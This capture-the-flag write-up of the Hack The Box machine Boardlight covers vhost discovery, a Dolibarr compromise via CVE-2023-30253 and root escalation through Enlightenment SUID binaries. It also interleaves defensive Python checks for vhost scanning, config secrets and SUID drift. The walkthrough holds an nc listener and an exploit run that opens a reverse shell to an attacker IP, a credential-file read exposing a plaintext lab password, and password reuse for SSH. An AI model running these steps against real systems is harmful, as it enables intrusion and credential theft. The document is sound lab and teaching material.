> m4rt@CTF_ARCHIVE:~$

Hack The Box / LINUX / 2026-03-27

Hack The Box - Boardlight (Linux)

VHost discovery leads to Dolibarr compromise via CVE-2023-30253 and root escalation through vulnerable Enlightenment SUID binaries.

Target

  • IP: 10.129.115.160

Recon

sudo nmap -sC -sV 10.129.115.160 -p- -v -T5
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Browse to http://10.129.115.160/.

It is a PHP site. The footer at the bottom of the page reads:

2020 All Rights Reserved By Board.htb

Add board.htb to /etc/hosts.

VHost Discovery

gobuster vhost -u 'http://board.htb/' -w /home/kali/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 50 --append-domain
Found: crm.board.htb Status: 200 [Size: 6360]

Add crm.board.htb to /etc/hosts and browse to http://crm.board.htb.
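Virtual-host brute forcing like the gobuster run above is noisy on the server side: one source sends many requests that differ only in the Host header, and the only response that looks different is the one for a name that really exists. As an added example (not part of this write-up and not gobuster code), here is a small Python detector over Apache access logs. It assumes a LogFormat that records the requested Host header as the first field, `%{Host}i` (my assumption; the default combined format does not record it), and it runs on constructed sample lines whose addresses and sizes are made up.

```python
import re
from collections import defaultdict, Counter

# Assumed Apache LogFormat (an assumption for this example, not from the write-up):
#   LogFormat "%{Host}i %h %t \"%r\" %>s %O" hostlog
# %{Host}i records the Host header the client sent, which is what a vhost
# brute-forcer varies; %v would only show the vhost that answered.
LINE_RE = re.compile(
    r'^(?P<host>\S+) (?P<src>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\d+)$'
)


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["bytes"] = int(rec["bytes"])
    return rec


def find_vhost_enumeration(lines, threshold=20):
    """Flag sources that asked for more than `threshold` distinct Host values.

    For each flagged source, 'hits' lists the Host values whose response size
    differed from the dominant (catch-all vhost) size. That is the same signal
    a brute-forcer uses to decide a name is real, so it tells the analyst which
    names the scanner would have discovered.
    """
    hosts_by_src = defaultdict(dict)  # src ip -> {host: response bytes}
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            hosts_by_src[rec["src"]][rec["host"]] = rec["bytes"]

    report = {}
    for src, hosts in hosts_by_src.items():
        if len(hosts) <= threshold:
            continue
        baseline = Counter(hosts.values()).most_common(1)[0][0]
        hits = sorted(h for h, size in hosts.items() if size != baseline)
        report[src] = {"distinct_hosts": len(hosts), "hits": hits}
    return report


def build_sample():
    """Constructed log lines: one scanner cycling through candidate names and
    one ordinary visitor. Addresses, names and sizes are made up."""
    stamp = "[27/Mar/2026:10:00:00 +0000]"
    lines = []
    names = [f"w{i}.board.htb" for i in range(29)] + ["crm.board.htb"]
    for name in names:
        size = 6360 if name == "crm.board.htb" else 271
        lines.append(f'{name} 203.0.113.5 {stamp} "GET / HTTP/1.1" 200 {size}')
    lines.append(f'board.htb 198.51.100.7 {stamp} "GET / HTTP/1.1" 200 15420')
    lines.append(f'board.htb 198.51.100.7 {stamp} "GET /about.php HTTP/1.1" 200 9810')
    lines.append("this line is not in the expected format")
    return lines


if __name__ == "__main__":
    for src, info in find_vhost_enumeration(build_sample()).items():
        print(f"{src}: {info['distinct_hosts']} distinct Host values, hits: {info['hits']}")
```

Run it against a real log by feeding `open(path)` to `find_vhost_enumeration` instead of `build_sample()`. The threshold is per source over the whole file; in production you would bucket by time window as well, since a legitimate proxy can front many hostnames.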

Detected application: Dolibarr

Log in with:

  • Username: admin
  • Password: admin

Initial Access

There is a public PoC for CVE-2023-30253:

  • https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

Start listener:

nc -vlnp 4444

Run exploit:

python3 exploit.py 'http://crm.board.htb' admin admin 10.10.14.153 4444

We get a reverse shell as www-data.

Credential Discovery and User Access

cat /var/www/html/crm.board.htb/htdocs/conf/conf.php
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';

ls /home

Found a user larissa. The database password from conf.php also works for SSH:

SSH with:

  • User: larissa
  • Password: serverfun2$2023!!
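Two weaknesses stack here: conf.php keeps the database password in plaintext where the web-server account can read it, and the same password is a user's login password. As an added example (not part of the write-up and not Dolibarr code), the following Python audit parses a PHP config of this shape, reports whether the file's mode lets group or others read or write it, and names the settings that hold secrets. The sample config text, its placeholder password and the `write_demo_config` helper are constructed for this example.

```python
import os
import re
import stat
import tempfile

# One PHP assignment per line, single- or double-quoted value, as in conf.php.
ASSIGN_RE = re.compile(
    r"""^\s*\$(\w+)\s*=\s*(?:'((?:[^'\\]|\\.)*)'|"((?:[^"\\]|\\.)*)")\s*;""",
    re.MULTILINE,
)
# Key names that usually hold material worth protecting.
SECRET_KEY_RE = re.compile(r"pass|secret|key|token|salt", re.IGNORECASE)


def parse_php_config(text):
    """Extract $name='value'; assignments into a dict, undoing PHP quote escapes."""
    conf = {}
    for m in ASSIGN_RE.finditer(text):
        name, single, double = m.groups()
        raw = single if single is not None else double
        conf[name] = re.sub(r"\\([\"'\\])", r"\1", raw)
    return conf


def secret_keys(conf):
    """Names of non-empty settings whose key suggests a secret."""
    return sorted(k for k, v in conf.items() if v and SECRET_KEY_RE.search(k))


def audit_config_file(path):
    """Return findings: loose permission bits first, then plaintext secrets."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    findings = []
    if mode & stat.S_IROTH:
        findings.append("world-readable")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("writable by group or others")
    with open(path, encoding="utf-8") as fh:
        conf = parse_php_config(fh.read())
    findings.extend(f"plaintext secret in ${k}" for k in secret_keys(conf))
    return findings


# Constructed stand-in for conf.php. The password is a placeholder, not the
# value from the write-up, and contains an escaped quote to exercise the parser.
SAMPLE_CONF = """<?php
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='Examp\\'le!2023';
$dolibarr_main_url_root="http://crm.board.htb";
"""


def write_demo_config(mode):
    """Write SAMPLE_CONF to a temporary file with the given mode; return its path."""
    fd, path = tempfile.mkstemp(suffix=".php")
    with os.fdopen(fd, "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_CONF)
    os.chmod(path, mode)
    return path


if __name__ == "__main__":
    for mode in (0o644, 0o400):
        print(oct(mode), audit_config_file(write_demo_config(mode)))
```

A finding of "world-readable" is the one that turned the web shell into a user shell here; the plaintext-secret finding is unavoidable for a database password, which is why it must not be shared with any interactive account.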

Privilege Escalation

Upload and run linpeas (https://github.com/peass-ng/PEASS-ng/releases).

Interesting findings:

-rwsr-xr-x 1 root root 27K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!)
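The linpeas lines above are exactly what a host-integrity check should produce on its own, before anyone runs an enumeration script. As an added example (not part of the write-up and not linpeas code), here is a Python inventory that parses such ls-style lines, scans the filesystem for SUID-root regular files, and diffs the result against an allowlist. The `BASELINE` set and the scanned roots are assumptions for the example; build the real baseline from a freshly provisioned image of the same build.

```python
import os
import re
import stat

# Baseline of SUID-root binaries expected on the host. This set is an
# assumption for the example, not taken from the write-up; generate the real
# one from a clean image of the same build and keep it under version control.
BASELINE = {
    "/usr/bin/passwd",
    "/usr/bin/sudo",
    "/usr/bin/su",
}

# The four linpeas findings quoted in the write-up.
LINPEAS_OUTPUT = """\
-rwsr-xr-x 1 root root 27K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!)
"""

PERMS_RE = re.compile(r"^[-dlcbps][rwxsStT-]{9}[.+]?$")


def is_suid_root(st_mode, st_uid):
    """True for a regular file owned by uid 0 with the set-user-ID bit set."""
    return stat.S_ISREG(st_mode) and st_uid == 0 and bool(st_mode & stat.S_ISUID)


def parse_ls_line(line):
    """Parse an 'ls -l' style line (as printed by linpeas) into a dict.
    Returns None for lines that do not look like a file entry."""
    parts = line.split(None, 8)
    if len(parts) < 9 or not PERMS_RE.match(parts[0]):
        return None
    perms, _links, owner, group, _size, _mon, _day, _year, rest = parts
    path = re.sub(r"\s+\([^)]*\)$", "", rest)  # drop linpeas' trailing '(...)' tag
    return {"path": path, "owner": owner, "group": group, "suid": perms[3] in "sS"}


def suid_paths_from_ls(text):
    """Paths of SUID entries owned by root in ls/linpeas style output."""
    return {r["path"] for r in map(parse_ls_line, text.splitlines())
            if r and r["suid"] and r["owner"] == "root"}


def scan_filesystem(roots=("/usr", "/bin", "/sbin", "/opt", "/home")):
    """Walk the given roots and return the set of SUID-root regular files."""
    found = set()
    for root in roots:
        for dirpath, _dirs, files in os.walk(root, onerror=lambda e: None):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)  # lstat: never follow symlinks
                except OSError:
                    continue
                if is_suid_root(st.st_mode, st.st_uid):
                    found.add(path)
    return found


def compare_with_baseline(found, baseline=BASELINE):
    """Split a scan result into binaries absent from the baseline (investigate)
    and baseline entries that have disappeared (also worth a look)."""
    found = set(found)
    return {"unknown": sorted(found - baseline), "missing": sorted(baseline - found)}


if __name__ == "__main__":
    print("from linpeas text:", compare_with_baseline(suid_paths_from_ls(LINPEAS_OUTPUT)))
    print("from live scan:   ", compare_with_baseline(scan_filesystem()))
```

Run the live scan from a scheduled job and alert on a non-empty "unknown" list; a desktop environment's helper binaries landing on a server that serves only a CRM is the kind of drift this catches.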

Public exploit:

  • https://www.exploit-db.com/exploits/51180

Save the exploit as exp.sh and run it:

./exp.sh

We get a root shell.